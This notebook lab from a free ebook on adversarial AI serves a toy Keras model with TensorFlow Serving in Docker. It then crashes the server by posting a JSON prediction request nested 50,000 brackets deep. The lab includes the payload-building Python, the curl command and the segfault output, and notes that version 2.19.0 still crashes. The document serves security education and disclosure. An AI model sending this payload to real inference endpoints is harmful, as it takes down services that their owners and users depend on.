<img style="max-width:20em; height:auto;" src="../graphics/A-Little-Book-on-Adversarial-AI-Cover.png"/>

Author: Nik Alleyne   
Author Blog: https://www.securitynik.com   
Author GitHub: github.com/securitynik   

Author Other Books: [   

            "https://www.amazon.ca/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458/",   
            
            "https://www.amazon.ca/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024/"   
        ]   


This notebook ***(attacking_tf_serving_dos.ipynb)*** is part of the series of notebooks From ***A Little Book on Adversarial AI***  A free ebook released by Nik Alleyne

### Exploiting TF Serving via DoS  
**CVE-2025-0649**
https://nvd.nist.gov/vuln/detail/CVE-2025-0649 

To ensure we are good to go, let us setup a new docker environment.   

Let us start off with setting up a docker file  

### Create a directory  
In your *tmp* directory, create a folder named **tf_serv_vuln**   
We really do not need this, I am just setting a place we can work out of if needed
$ **mkdir --parents /tmp/tf_serv_vuln**   

Change to the directory   
$ **cd /tmp/tf_serv_vuln/**     


### Get the docker image  
$ **sudo docker pull tensorflow/serving:2.18.0**    

### Confirm the image has been added   
$ **sudo docker images**   


### Lab Objectives:  
- Target a known vulnerability in the inference platform 
- Leverage TFServing for serving models   
- Identify how vulnerabilities in the API endpoint can impact availability  
- Recognize that all a threat actor needs, is the ability to interact with your environment, then anything is possible.   
- Learn some quick docker usage   


### Step 1:  

In [1]:
# Import the libraries

import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
import numpy as np
from sklearn.datasets import make_classification

2025-07-13 17:59:55.081332: I tensorflow/core/util/port.cc:153] oneDNN custom operations are on. You may see slightly different numerical results due to floating-point round-off errors from different computation orders. To turn them off, set the environment variable `TF_ENABLE_ONEDNN_OPTS=0`.
2025-07-13 17:59:55.108495: E external/local_xla/xla/stream_executor/cuda/cuda_fft.cc:467] Unable to register cuFFT factory: Attempting to register factory for plugin cuFFT when one has already been registered
E0000 00:00:1752443995.139040   67971 cuda_dnn.cc:8579] Unable to register cuDNN factory: Attempting to register factory for plugin cuDNN when one has already been registered
E0000 00:00:1752443995.148697   67971 cuda_blas.cc:1407] Unable to register cuBLAS factory: Attempting to register factory for plugin cuBLAS when one has already been registered
W0000 00:00:1752443995.452015   67971 computation_placer.cc:177] computation placer already registered. Please check linkage and avoid linking 

In [2]:
# On my system, there is a compatibility issue between my Cuda and Tensorflow
# As a result I disable the GPU by default for Tensorflow.
# If Tensorflow is working fine on your system, then feel free to comment out the lines below

# Comment out this line if your GPU works fine in Tensorflow 
print(f'[-] Disabling the GPU')
tf.config.set_visible_devices(devices=[], device_type='GPU')

[-] Disabling the GPU


W0000 00:00:1752444005.895904   67971 gpu_device.cc:2430] TensorFlow was not built with CUDA kernel binaries compatible with compute capability 12.0. CUDA kernels will be jit-compiled from PTX, which could take 30 minutes or longer.


In [3]:
### Version of key libraries used  
print(f'Tensorflow version used:  {tf.__version__}')
print(f'Numpy version used:  {np.__version__}')
print(f'keras version used:  {keras.__version__}')

Tensorflow version used:  2.19.0
Numpy version used:  2.1.3
keras version used:  3.10.0


To ensure this lab can stand on its own, let's build a simple tensorflow model. This model will also be served

In [4]:
# Get some toy data
X_train, y_train = make_classification(n_samples=100, n_features=4, n_classes=2, random_state=10)

# Get the shape of the data
X_train.shape, y_train.shape

((100, 4), (100,))

Here we build our model   


### Step 2:   

In [5]:
# Set the random number generator
tf.keras.utils.set_random_seed(10)

# Build model
model = keras.Sequential([
    layers.Input(shape=(4,)),
    layers.Dense(units=16, activation='relu', name='first_hidden'),
    layers.Dense(units=8, activation='relu', name='second_hidden'),
    layers.Dense(units=1, activation='sigmoid', name='output')
], name='simple_model')

# Get the model summary
model.summary()

In [6]:
# Compile the model
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])

In [7]:
# Train the model for 5 epochs
# The accuracy is not important here
model.fit(X_train, y_train, epochs=5, batch_size=32)

Epoch 1/5


I0000 00:00:1752444018.628577   68137 service.cc:152] XLA service 0x7fdbcc00b020 initialized for platform Host (this does not guarantee that XLA will be used). Devices:
I0000 00:00:1752444018.628810   68137 service.cc:160]   StreamExecutor device (0): Host, Default Version
2025-07-13 18:00:18.721902: I tensorflow/compiler/mlir/tensorflow/utils/dump_mlir_util.cc:269] disabling MLIR crash reproducer, set env var `MLIR_CRASH_REPRODUCER_DIRECTORY` to enable.


[1m1/4[0m [32m━━━━━[0m[37m━━━━━━━━━━━━━━━[0m [1m6s[0m 2s/step - accuracy: 0.3125 - loss: 0.8268

I0000 00:00:1752444019.702361   68137 device_compiler.h:188] Compiled cluster using XLA!  This line is logged at most once for the lifetime of the process.


[1m4/4[0m [32m━━━━━━━━━━━━━━━━━━━━[0m[37m[0m [1m3s[0m 179ms/step - accuracy: 0.3450 - loss: 0.7554
Epoch 2/5
[1m4/4[0m [32m━━━━━━━━━━━━━━━━━━━━[0m[37m[0m [1m0s[0m 16ms/step - accuracy: 0.3450 - loss: 0.7398
Epoch 3/5
[1m4/4[0m [32m━━━━━━━━━━━━━━━━━━━━[0m[37m[0m [1m0s[0m 15ms/step - accuracy: 0.3511 - loss: 0.7270
Epoch 4/5
[1m4/4[0m [32m━━━━━━━━━━━━━━━━━━━━[0m[37m[0m [1m0s[0m 14ms/step - accuracy: 0.3511 - loss: 0.7154
Epoch 5/5
[1m4/4[0m [32m━━━━━━━━━━━━━━━━━━━━[0m[37m[0m [1m0s[0m 16ms/step - accuracy: 0.3603 - loss: 0.7047


<keras.src.callbacks.history.History at 0x7fdf05805e50>

In [8]:
# Give the model a sample to make a prediction
model.predict(np.array([[0.1, 0.2, 0.3, 0.4]]))

[1m1/1[0m [32m━━━━━━━━━━━━━━━━━━━━[0m[37m[0m [1m0s[0m 267ms/step


array([[0.50004435]], dtype=float32)

With the model built, it has to be exported to be used by our inference endpoint TFServing. We just save it in the temp folder in this case. 

Notice the *1*, this is important as we need version information also.

### Step 3:  

In [9]:
# Now that we know the model can make predictions let us save it
# Save model in TF Serving format (SavedModel) using new Keras 3 method
export_path = "/tmp/models/my_model/1/"
model.export(export_path)

INFO:tensorflow:Assets written to: /tmp/models/my_model/1/assets


INFO:tensorflow:Assets written to: /tmp/models/my_model/1/assets


Saved artifact at '/tmp/models/my_model/1/'. The following endpoints are available:

* Endpoint 'serve'
  args_0 (POSITIONAL_ONLY): TensorSpec(shape=(None, 4), dtype=tf.float32, name='keras_tensor')
Output Type:
  TensorSpec(shape=(None, 1), dtype=tf.float32, name=None)
Captures:
  140595846077840: TensorSpec(shape=(), dtype=tf.resource, name=None)
  140595846081104: TensorSpec(shape=(), dtype=tf.resource, name=None)
  140595846079952: TensorSpec(shape=(), dtype=tf.resource, name=None)
  140595846078416: TensorSpec(shape=(), dtype=tf.resource, name=None)
  140595846081680: TensorSpec(shape=(), dtype=tf.resource, name=None)
  140595846078800: TensorSpec(shape=(), dtype=tf.resource, name=None)


If you encounter an error such as "... tree: command not found", you will need to install it via.   

$ **sudo apt install tree**

In [11]:
# let us verify the structure of our model
!tree /tmp/models

[01;34m/tmp/models[0m
└── [01;34mmy_model[0m
    └── [01;34m1[0m
        ├── [01;34massets[0m
        ├── fingerprint.pb
        ├── saved_model.pb
        └── [01;34mvariables[0m
            ├── variables.data-00000-of-00001
            └── variables.index

5 directories, 4 files


We have our model, we have our structure, we have TF Serving, let us now serve the model.   

### Step 4:   

With the above in place, let us setup our inference endpoint   
**sudo docker run --rm -p 8501:8501 --name=tfserving -v "/tmp/models/my_model:/models/vuln_tf_serv" -e MODEL_NAME=vuln_tf_serv  tensorflow/serving:2.18.0**   

If this worked as expected you should see something such as   ...

2025-07-11 20:40:45.255413: I tensorflow_serving/model_servers/server.cc:423] Running gRPC ModelServer at 0.0.0.0:8500 ...    
[warn] getaddrinfo: address family for nodename not supported   
2025-07-11 20:40:45.259994: I tensorflow_serving/model_servers/server.cc:444] Exporting HTTP/REST API at:localhost:8501 ...   
[evhttp_server.cc : 250] NET_LOG: Entering the event loop ...    

To confirm above is good, run   
$ **curl http://localhost:8501/v1/models/vuln_tf_serv**   
{   
 "model_version_status": [   
  {   
   "version": "1",   
   "state": "AVAILABLE",   
   "status": {   
    "error_code": "OK",   
    "error_message": ""   
   }   
  }   
 ]   
}   

Above suggests we are good go. Let us make a prediction.   
$  curl --request POST http://localhost:8501/v1/models/vuln_tf_serv:predict --header "Content-Type: application/json" --header "User-agent: Adversarial AI" -d  '{"instances": [[0.1, 0.2, 0.3, 0.4]]}'

If above runs successfully, you should see the predictions returned, looking something like:    
{   
    "predictions": [[0.500044346]   
    ]   
}   


Now that we know the inference endpoint is working as expected, let us target it.   


### Step 5:  

In [None]:
# The information being written to the file is nothing exciting
# From a simple perspective, this is what we are doing
# Just that the number of brackets is determined by our recurse_depth variable
'[' * 10 + '0.5' + ']' * 10

In [None]:
# How deep should we recurse.
# Let us start with 1000
recurse_depth = 1000  

# Create a file on the file system
with open(file="/tmp/tf_serv_vuln.json", mode="w") as f:
    # Write to the file
    # This information should look similary to what you say earlier
    f.write('{"instances": ' + ('[' * recurse_depth) + '0.5' + (']' * recurse_depth) + '}')

# verify the file has been created 
!ls /tmp/tf_serv_vuln.json


With the file now available, let's feed that to tfserving  
Note the change we made to the data  **--data-binary @/tmp/tf_serv_vuln.json**
curl -X request http://localhost:8501/v1/models/vuln_tf_serv:predict --header "Content-Type: application/json" --header "User-agent: Adversarial AI" --data-binary @/tmp/tf_serv_vuln.json   

At this point, in your console you should see something like:  
{
    "error": "tensor parsing error: keras_tensor_4"
}


The above my suggest that it did not work. However, let us try something else.  

Let us increase the recurse depth to 50000. Maybe this will make a difference, maybe it will not. 


### Step 6:  


In [None]:
# Increase recurse_depth to 50_000
recurse_depth = 50_000  

# Create a file on the file system
with open(file="/tmp/tf_serv_vuln.json", mode="w") as f:
    # Write to the file
    # This information should look similary to what you say earlier
    f.write('{"instances": ' + ('[' * recurse_depth) + '0.5' + (']' * recurse_depth) + '}')

# verify the file has been created 
!ls /tmp/tf_serv_vuln.json


Run the same command again:   
curl --request POST http://localhost:8501/v1/models/vuln_tf_serv:predict --header "Content-Type: application/json" --header "User-agent: Adversarial AI" --data-binary @/tmp/tf_serv_vuln.json

This time we see at our Curl command prompt.   

$ curl --request POST http://localhost:8501/v1/models/vuln_tf_serv:predict --header "Content-Type: application/json" --header "User-agent: Adversarial AI"  --data-binary @/tmp/tf_serv_vuln.json
curl: (52) Empty reply from server    

When we look at the TFServing console we see:  

**/usr/bin/tf_serving_entrypoint.sh: line 3:     7 Segmentation fault      (core dumped) tensorflow_model_server --port=8500 --rest_api_port=8501 --model_name=${MODEL_NAME} --model_base_path=${MODEL_BASE_PATH}/${MODEL_NAME} "$@"**   

We know now we were able to successfully create a denial of service attack against the inference endpoint.  

Let us now mitigate this issue by removing this instance of TFServing and installing instead the latest version.   


### Step 7:  


let us start by removing this version   
$ sudo docker images
REPOSITORY           TAG       IMAGE ID       CREATED        SIZE   
tensorflow/serving   2.18.0    **ccc3b2242411**   8 months ago   711 MB      

Removing that image    
$ **sudo docker rmi --force ccc3b2242411**
Untagged: tensorflow/serving:2.18.0       


Remove any unused docker object and free up some space   
Realistically we do not have any in this case.
So this is just a little trick to use in the future to clean up 
$ **sudo docker system prune --all --force**    


Ensure we are good to go   
$ sudo docker images --all
REPOSITORY   TAG       IMAGE ID   CREATED   SIZE



Get the latest version now. At the time of this writing, this is 2.19.0 
$ **sudo docker pull tensorflow/serving:2.19.0**    


### Step 8:   

In [None]:
Notice the change to **2.19.0** at the end from 2.18.0

Verify we got the correct image  
$  **sudo docker images --all**   
REPOSITORY           TAG       IMAGE ID       CREATED        SIZE   
tensorflow/serving   2.19.0    d871e064642e   2 months ago   729MB   


Serve the image 
**sudo docker run --rm -p 8501:8501 --name=tfserving -v "/tmp/models/my_model:/models/patched_tf_serv" -e MODEL_NAME=patched_tf_serv  tensorflow/serving:2.19.0**   


Verify the server is available:  
$ curl http://localhost:8501/v1/models/patched_tf_serv   


Validate we can still make predictions   

$ curl --request POST http://localhost:8501/v1/models/patched_tf_serv:predict --header "Content-Type: application/json" --header "User-agent: Adversarial AI" -d '{"instances": [[0.1, 0.2, 0.3, 0.4]]}'
{
    "predictions": [[0.481608093]
    ]
}


Finally, can we crash the server again?    
Unfortunately it did crash it again.  

$curl --request POST "http://localhost:8501/v1/models/patched_tf_serv:predict" --header "Content-Type: application/json" --header "User-agent: Adversarial AI" --data-binary @/tmp/tf_serv_vuln.json
curl: (52) Empty reply from server

/usr/bin/tf_serving_entrypoint.sh: line 3:     7 Segmentation fault      (core dumped) tensorflow_model_server --port=8500 --rest_api_port=8501 --model_name=${MODEL_NAME} --model_base_path=${MODEL_BASE_PATH}/${MODEL_NAME} "$@"


I reported this as an issue to the TFServing team. https://github.com/tensorflow/serving/issues/4116.

We will see what they come back with.



### Lab Takeaways:  
- We leveraged Tensorflow Serving for serving our model  
- We saw this version is vulnerable to a Denial of Service (DoS) attack   
- We saw while we were told to upgrade to resolve this issue, that did not work  